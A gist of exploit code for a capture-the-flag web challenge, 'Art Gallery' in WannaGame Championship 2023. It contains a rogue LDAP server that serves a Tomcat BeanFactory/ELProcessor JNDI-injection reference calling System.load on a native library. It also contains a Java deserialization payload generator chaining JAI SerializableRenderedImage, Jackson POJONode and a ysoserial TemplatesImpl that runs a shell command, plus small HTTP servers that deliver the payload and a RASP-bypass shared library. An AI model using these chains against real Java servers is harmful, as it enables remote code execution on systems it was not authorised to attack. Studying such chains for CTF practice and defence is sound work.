@to016
Last active December 3, 2023 05:58
Art Gallery Challenge in WannaGame Championship 2023
import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;
import org.apache.naming.ResourceRef;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;
/**
 * Stand-alone LDAP listener (UnboundID in-memory server) that answers every
 * search with one entry whose {@code javaSerializedData} attribute holds a
 * serialized Tomcat {@link ResourceRef}.  This is the server half of a
 * JNDI-injection chain: a target that performs a JNDI lookup against this
 * listener receives the reference and resolves it through the factory class
 * named inside it ({@code org.apache.naming.factory.BeanFactory}).  The
 * reference carries no factory location (the last constructor argument is
 * {@code null}) and the codebase URL taken from the command line is stored but
 * never read, so nothing here depends on remote class loading.
 *
 * <p>Defensive reading: the observable indicators are an outbound LDAP
 * connection from the application to an unexpected host/port and a search
 * result carrying {@code javaClassName}/{@code javaSerializedData}.  The
 * mitigation on the application side is to never pass attacker-influenced
 * names to JNDI lookups.
 */
public class EvilLdapServer {
    /** Base DN of the in-memory directory; every search is answered at its own base DN. */
    private static final String LDAP_BASE = "dc=example,dc=com";

    /**
     * Entry point.
     *
     * @param args {@code args[0]} must contain a {@code '#'} and parse as a URL
     *             (only checked, then stored unused); optional {@code args[1]}
     *             overrides the listen port (default 1389).
     */
    public static void main(String[] args) {
        int port = 1389;
        // The usage text advertises "<codebase_url#classname>", but the interceptor
        // below never consults the URL; the '#' check is the only thing enforced.
        if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) {
            System.err.println(EvilLdapServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
            System.exit(-1);
        }
        else if ( args.length > 1 ) {
            port = Integer.parseInt(args[ 1 ]);
        }
        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            // Plain (non-TLS) listener bound to all interfaces.
            config.setListenerConfigs(new InMemoryListenerConfig(
                "listen", //$NON-NLS-1$
                InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
                port,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()));
            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();
        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    /**
     * Intercepts every search and replaces the result with a single crafted entry.
     */
    private static class OperationInterceptor extends InMemoryOperationInterceptor {
        // Stored for reference only; nothing in this class reads it.
        private URL codebase;

        /**
         * @param cb the URL given on the command line (kept but unused)
         */
        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }

        /**
         * Builds an empty entry at the request's base DN and hands it to
         * {@link #sendResult}; any failure is only printed.
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }
        }

        /**
         * Populates {@code e} with a serialized {@link ResourceRef} and sends it as
         * the search result.  The reference names {@code javax.el.ELProcessor} as the
         * bean class and Tomcat's {@code BeanFactory} as the object factory; the
         * {@code forceString} address remaps property {@code x} onto the bean's
         * {@code eval} method, so the {@code x} value (an EL string that calls
         * {@code System.load} on a native-library path, left as a placeholder in
         * this gist) is evaluated when the factory populates the bean.
         *
         * @param result the intercepted search to answer
         * @param base   the request's base DN; not used here, {@code e} was already built from it
         * @param e      the entry to fill and send (modified in place)
         * @throws LDAPException if sending the entry or result fails
         * @throws IOException   if serializing the reference fails
         */
        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, IOException {
            e.addAttribute("javaClassName", "javax.el.ELProcessor");
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
            ref.add(new StringRefAddr("forceString", "x=eval"));
            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"java.lang.System\").getMethod(\"load\", \"\".getClass()).invoke(null,\"/tmp/<temp_file_of_malicious_.so_file>\")"));
            // Plain Java serialization of the reference; the stream is never
            // explicitly closed (a try-with-resources would be the tidier form).
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
            objectOutputStream.writeObject(ref);
            e.addAttribute("javaSerializedData", byteArrayOutputStream.toByteArray());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
            System.out.println("Sent result");
        }
    }
}
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.*;
import ysoserial.payloads.util.Gadgets;
import javax.media.jai.remote.SerializableRenderedImage;
import javax.naming.CompositeName;
import java.awt.*;
import java.awt.image.BufferedImage;
import java.io.*;
import java.lang.reflect.*;
import java.util.Base64;
import java.util.HashMap;
import java.util.zip.GZIPOutputStream;
/**
 * Payload generator for the challenge: writes {@code gzip_payload.bin}, a
 * GZIP-compressed Java serialization stream whose top-level object is a JAI
 * {@link SerializableRenderedImage}.  The image class's private
 * {@code writeObject} is replaced at runtime (javassist) so that, after the
 * normal image state, the stream carries a second, base64-decoded serialized
 * object: a {@link HashMap} built by {@link #makeMap} holding a Jackson
 * {@link POJONode} (wrapping a ysoserial TemplatesImpl) and an {@link XString}.
 *
 * <p>From a defender's point of view this is Java deserialization of untrusted
 * data; the robust mitigation on the receiving side is not to deserialize
 * untrusted streams at all, or to enforce an {@code ObjectInputFilter}
 * allow-list that rejects classes such as the ones assembled here.
 */
public class Main2 {
    /**
     * Builds the nested payload and writes it to {@code gzip_payload.bin};
     * every failure is only printed.
     */
    public static void main(String[] args) {
        try {
            // Strip BaseJsonNode.writeReplace in this JVM so that a POJONode is
            // written by plain Java serialization instead of being substituted
            // with a replacement object on write.
            ClassPool classPool = new ClassPool(true);
            CtClass ctClass = classPool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
            CtMethod writeReplace = ctClass.getDeclaredMethod("writeReplace");
            ctClass.removeMethod(writeReplace);
            ctClass.toClass();

            // Reflectively builds a com.sun.jndi.ldap.LdapAttribute pointing at an
            // external LDAP URL.  NOTE: `ldapAttribute` is never used below, so
            // this section is dead code as written (presumably a leftover from an
            // alternative chain).
            String ldapCtxUrl = "ldap://192.168.169.1:9999/";
            Class ldapAttributeClazz = Class.forName("com.sun.jndi.ldap.LdapAttribute");
            Constructor ldapAttributeClazzConstructor = ldapAttributeClazz.getDeclaredConstructor(
                new Class[] {String.class});
            ldapAttributeClazzConstructor.setAccessible(true);
            Object ldapAttribute = ldapAttributeClazzConstructor.newInstance(
                new Object[] {"name"});
            Field baseCtxUrlField = ldapAttributeClazz.getDeclaredField("baseCtxURL");
            baseCtxUrlField.setAccessible(true);
            baseCtxUrlField.set(ldapAttribute, ldapCtxUrl);
            Field rdnField = ldapAttributeClazz.getDeclaredField("rdn");
            rdnField.setAccessible(true);
            rdnField.set(ldapAttribute, new CompositeName("a/b"));

            // TemplatesImpl from ysoserial carrying the command string, wrapped in
            // a Jackson POJONode; presumably the node's rendering is what reaches
            // the TemplatesImpl getters on the receiving side -- confirm against
            // the Jackson version in play.
            POJONode pojoNode = new POJONode(Gadgets.createTemplatesImpl(new String[]{"touch /tmp/to"}));
            XString xString = new XString("xxx");
            // Two maps with identical keys and swapped values.  makeMap folds them
            // into a table whose two nodes both have hash 0, so the receiving
            // HashMap has to compare the keys when it rebuilds itself, pairing the
            // XString with the POJONode.
            HashMap map1 = new HashMap();
            map1.put("to", pojoNode);
            map1.put("v1", xString);
            HashMap map2 = new HashMap();
            map2.put("to", xString);
            map2.put("v1", pojoNode);
            HashMap finalMap = makeMap(map1, map2);
            ByteArrayOutputStream byteArrayOutputStream1 = new ByteArrayOutputStream();
            ObjectOutputStream objectOutputStream1 = new ObjectOutputStream(byteArrayOutputStream1);
            objectOutputStream1.writeObject(finalMap);
            objectOutputStream1.close();
            // Inner payload, base64-encoded so it can be embedded as a string
            // literal in the generated writeObject body below.
            String encodedPayloadCalc = Base64.getEncoder().encodeToString(byteArrayOutputStream1.toByteArray());

            // Create a sample RenderedImage -- only needed so that a valid
            // SerializableRenderedImage can be constructed around it.
            int width = 300;
            int height = 200;
            BufferedImage bufferedImage = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);
            Graphics2D g2d = bufferedImage.createGraphics();
            g2d.setColor(Color.WHITE);
            g2d.fillRect(0, 0, width, height);
            g2d.setColor(Color.RED);
            g2d.drawLine(0, 0, width, height);
            g2d.dispose();

            // Replace SerializableRenderedImage.writeObject in this JVM: after the
            // default fields, the sampleModel/colorModel states and a null
            // propertyTable, it writes the decoded inner payload as a byte[].
            ClassPool classPool2 = ClassPool.getDefault();
            CtClass serializableRenderedImageClass = classPool2.get("javax.media.jai.remote.SerializableRenderedImage");
            CtMethod writeObjectMethod = serializableRenderedImageClass.getDeclaredMethod("writeObject");
            serializableRenderedImageClass.removeMethod(writeObjectMethod);
            CtMethod newWriteObjectMethod = CtNewMethod.make(
                "private void writeObject(java.io.ObjectOutputStream out) throws java.io.IOException {\n" +
                " out.defaultWriteObject();\n" +
                " Object propertyTable = null;\n" +
                " out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.sampleModel, (java.awt.RenderingHints)null));\n" +
                " out.writeObject(javax.media.jai.remote.SerializerFactory.getState(this.colorModel, (java.awt.RenderingHints)null));\n" +
                " out.writeObject(propertyTable);" +
                " byte[] payloadBytes = java.util.Base64.getDecoder().decode(\""+ encodedPayloadCalc + "\".getBytes());" +
                " out.writeObject(payloadBytes);\n" +
                "}",
                serializableRenderedImageClass
            );
            serializableRenderedImageClass.addMethod(newWriteObjectMethod);
            serializableRenderedImageClass.toClass();
            SerializableRenderedImage serializableRenderedImage = new SerializableRenderedImage(bufferedImage);
            // Private flags set by reflection; assumed to steer the reader's
            // readObject down the tile-codec path -- confirm against the
            // SerializableRenderedImage source.
            setFieldValue(serializableRenderedImage, "useDeepCopy", true);
            setFieldValue(serializableRenderedImage, "useTileCodec", true);
            setFieldValue(serializableRenderedImage, "formatName", "raw");

            // oos.close() also closes the GZIP and file streams underneath it.
            FileOutputStream fos = new FileOutputStream("gzip_payload.bin");
            GZIPOutputStream gzipOS = new GZIPOutputStream(fos);
            ObjectOutputStream oos = new ObjectOutputStream(gzipOS);
            oos.writeObject(serializableRenderedImage);
            oos.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Sets a (possibly private) field on {@code obj} by name.
     *
     * @param obj       target instance
     * @param fieldName declared field name on {@code obj}'s runtime class
     * @param value     new value
     * @throws Exception if the field is missing or cannot be set
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Looks up a declared field and makes it accessible.
     *
     * <p>NOTE: {@link Class#getDeclaredField} throws {@link NoSuchFieldException}
     * rather than returning {@code null}, so the {@code else if} branch below is
     * unreachable and fields declared on a superclass are never found -- the
     * lookup only works for fields declared directly on {@code clazz}.
     *
     * @param clazz     class to search
     * @param fieldName declared field name
     * @return the accessible field
     * @throws Exception if {@code clazz} does not itself declare the field
     */
    public static Field getField(Class<?> clazz, String fieldName) throws Exception {
        Field field = clazz.getDeclaredField(fieldName);
        if (field != null) {
            field.setAccessible(true);
        } else if (clazz.getSuperclass() != null) {
            field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

    /**
     * Builds a {@link HashMap} of size 2 whose internal table holds two node
     * entries with hash 0, each using the given value as both key and value.
     * The table is installed by reflection rather than {@code put()}, so no
     * {@code hashCode()}/{@code equals()} is invoked on {@code v1}/{@code v2}
     * while the map is being built.
     *
     * @param v1 key/value of the first node
     * @param v2 key/value of the second node
     * @return the hand-assembled map
     * @throws Exception on any reflection failure (the remaining declared
     *                   exception types are redundant with {@code Exception})
     */
    public static HashMap makeMap(Object v1, Object v2) throws Exception, ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
        HashMap s = new HashMap();
        setFieldValue(s, "size", 2);
        Class nodeC;
        // Node class name differs between JDK 8+ (Node) and older releases (Entry).
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        } catch (ClassNotFoundException var6) {
            nodeC = Class.forName("java.util.HashMap$Entry");
        }
        Constructor nodeCons = nodeC.getDeclaredConstructor(Integer.TYPE, Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);
        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        setFieldValue(s, "table", tbl);
        return s;
    }
}
from tornado.ioloop import IOLoop
import tornado.web
import time
class MainHandler(tornado.web.RequestHandler):
    """Serve the raw bytes of ``payload.bin`` and keep the connection open."""

    def get(self):
        # Read the whole file up front, then push it to the client and hold the
        # response open for a very long time before finishing it.
        with open("payload.bin", "rb") as fh:
            body = fh.read()
        self.write(body)
        self.flush()
        time.sleep(99999)
        self.finish()
if __name__ == "__main__":
    # Single route mapped to the handler; fixed listen port.
    port = 8989
    routes = [(r'/get_bin.zip', MainHandler)]
    application = tornado.web.Application(routes)
    application.listen(port)
    print("Listening on port " + str(port))
    IOLoop.instance().start()
from tornado.ioloop import IOLoop
import tornado.web
import time
class MainHandler(tornado.web.RequestHandler):
    """Serve the raw bytes of ``bypassrasp.so`` and keep the connection open."""

    def get(self):
        # Read the whole file up front, then push it to the client and hold the
        # response open for a very long time before finishing it.
        with open("bypassrasp.so", "rb") as fh:
            body = fh.read()
        self.write(body)
        self.flush()
        time.sleep(99999)
        self.finish()
if __name__ == "__main__":
    # Single route mapped to the handler; fixed listen port.
    port = 8990
    routes = [(r'/get_so.zip', MainHandler)]
    application = tornado.web.Application(routes)
    application.listen(port)
    print("Listening on port " + str(port))
    IOLoop.instance().start()